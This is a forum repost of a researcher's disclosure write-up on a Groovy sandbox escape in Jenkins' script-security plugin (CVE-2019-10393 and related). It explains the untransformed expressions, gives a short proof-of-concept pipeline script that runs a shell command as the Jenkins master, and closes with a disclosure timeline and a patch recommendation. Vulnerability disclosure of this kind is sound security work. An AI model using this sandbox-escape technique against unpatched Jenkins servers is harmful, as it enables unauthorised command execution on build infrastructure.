Jump to content
Nytro

Jenkins – Groovy Sandbox breakout

Recommended Posts

Jenkins – Groovy Sandbox breakout (SECURITY-1538 / CVE-2019-10393, CVE-2019-10394, CVE-2019-10399, CVE-2019-10400)

Recently, I discovered a sandbox breakout in the Groovy Sandbox used by the Jenkins script-security Plugin in their Pipeline Plugin for build scripts. We responsibly disclosed this vulnerability and in the current version of Jenkins it has been fixed and the according Jenkins Security Advisory 2019-09-12 has been published. In this blogpost I want to report a bit on the technical details of the vulnerability.

 

Description

The groovy sandbox transforms some AST nodes of the script to add security checks. For example

ret = Runtime.getRuntime().exec("id")

will be transformed to something like

ret = Sandbox.call(Sandbox.call(Runtime.class, "getRuntime", []), "exec", ["id"])

Sandbox.call will check at runtime if the script can call the method with the given arguments.
However, there were some cases in which the transformer did not transform child expressions, which then could do anything.

  1. 1.(untransformed)()
  2. 1.(untransformed) = 1
  3. sometimesuntransformed++

In the first case the method name of a function call was not transformed. Who thought that a function name needs to be an identifier? The second case has the same problem but for the name of a property expression as the left-hand side of an assignment. For the last case the expression needs to not be of the form of a++, a++, a.b++. And in a.(b)++, b is also not transformed.
This allowed everyone who was able to supply build scripts to execute commands as the Jenkins Master.

PoC

The script-security and pipeline plugins are required but installed by default. A user with job/configure permission is needed to change the script code. The following pipeline script will run the id shell command and throw and error with its output.

@NonCPS
def e(){
	1.({throw new Error("id".execute().text)}())();
}
e();

Jenkins-Input-1024x434.png
@NonCPS is needed to disable a transformation step that would make problems.
The expected output of this script after a build is:
Jenkins-Output-1024x434.png
As seen in the output the command did run as Jenkins without approval of an administrator.

Disclosure Timeline

We responsibly disclosed this vulnerability and in the current version of Jenkins, it has been fixed and the according Jenkins Security Advisory 2019-09-12 has been published. The disclosure timeline was as follows:

  • 12.09.2019 – Public disclosure of vulnerability
10.09.2019 – Vulnerabilities were assigned CVE-2019-10393, CVE-2019-10394, CVE-2019-10399, CVE-2019-10400 06.09.2019 – Report

Conclusions

Sandboxing is hard and a little oversight (that property names can be arbitrary expressions) can lead to escapes.

I strongly recommend to update to the most current version if you use Jenkins, where this issue has been fixed and of course ensure proper patch and vulnerability management processes to be in place in general.

Best,

Nils

 

Sursa: https://insinuator.net/2019/09/jenkins-groovy-sandbox-breakout-security-1538-cve-2019-10393-cve-2019-10394-cve-2019-10399-cve-2019-10400/

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...